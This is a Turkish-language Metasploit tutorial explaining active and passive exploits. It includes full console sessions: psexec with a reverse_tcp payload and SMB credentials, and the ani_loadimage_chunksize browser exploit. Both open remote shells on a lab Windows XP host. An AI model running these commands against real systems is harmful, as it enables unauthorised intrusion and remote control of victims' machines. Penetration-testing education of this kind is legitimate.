MSF İçinde Exploit Çeşitleri?

Estimated read time 4 min read

Metasploit Framework içerisinde tüm exploit modülleri aktif ve pasif olarak gruplandırılırlar.

Aktif Exploit

Aktif exploitler, belirli bir hedef üzerinde çalışacak ve işlem tamamlanana kadar çalışmaya devam edecektir. Herhangi bir hata ile karşılaştığında çalışmayı durdururlar.

Örneğin, Brute-force modülü hedef bilgisayarda bir shell komut satırı açılana kadar çalışır ve işlemi bitince durur. İşlemlerinin tamamlanması uzun zaman alabileceğinden -j parametresi kullanılarak arka plana gönderilebilirler.

Aşağıdaki örnekte, ms08_067_netapi explotinin çalışmaya başlatılıp arka plana gönderildiğini görebilirsiniz.

msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >

Örnek

Bu örnekte, önceden keşif ile bilgileri elde edilen bir hedef bilgisayarın (192.168.1.100) gerekli değişkenleri ayarlanması ve çalışmaya başlaması görülmektedir. Hedef bilgisayarda shell açmak için psexec exploiti ve içerisinde reverse_tcp payload modülü kullanılmaktadır.

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Pasif Exploit

Pasif Exploitler, yerel bilgisayarda (kendi bilgisayarımız) pasif olarak çalışır ve dinlemede kalırlar. Hedef bilgisayarın bir şekilde yerel bilgisayara bağlanmasını beklerler.

Pasif exploitler neredeyse her durumda Web tarayıcı, FTP vb. istemciler üzerine odaklanırlar. Eposta ile gönderilen dosyalar içerisinden bağlantılarda da kullanılabilirler. Pasif exploit çalıştığında beklemeye başlar. Ne zaman bir kullanıcı sitedeki linke tıklar veya bir işlem yapar, işte o zaman dinlemedeki pasif exploit sinyali alır ve hedefte bir shell açar.

Arka planda çalışan ve dinleme yapan exploitlerin listesini sessions komutuna -l parametresi vererek görebilirsiniz. Listeden istediğiniz ID numaralı işleme gitmek için -i parametresini kullanabilirsiniz.

msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Örnek

Aşağıdaki örnekte, loadimage_chunksize exploiti ve reverse_tcp payload u kullanılarak bir kullanıcının Web sayfasına girmesi beklenmeye başlanmaktadır. LHOST değişkeni yerelde dinleme yapacak bilgisayar IP adresini, LPORT ise yerel bilgisayarda dinlenme yapacak port numarasını ifade eder.

msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.

[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

Anlatılmasını istediğiniz diğer başlıkları bize iletebilirsiniz.

Video Anlatım